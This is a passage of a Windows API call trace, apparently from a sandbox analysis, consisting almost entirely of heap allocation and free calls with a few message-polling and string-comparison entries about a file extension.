lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.417] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dc198 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.418] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.419] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.419] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deb78 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0179.419] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0179.420] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd390 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.420] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.420] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0179.420] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debf0 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.421] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.421] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ots", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0179.422] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".ots", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.422] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.422] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.422] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.422] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df168 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.423] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df168 | out: hHeap=0x8a0000) returned 1 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.423] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.424] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.424] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.424] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b00 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa0) returned 0x8f9058 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.425] PeekMessageW (in: lpMsg=0x87f194, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f194) returned 0 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b50 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.425] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b50 | out: hHeap=0x8a0000) returned 1 [0179.425] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.426] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def10 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deee8 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec18 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.426] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x170) returned 0x8fff00 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8f9058 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.427] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.427] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0179.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.428] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.428] RtlAllocateHeap 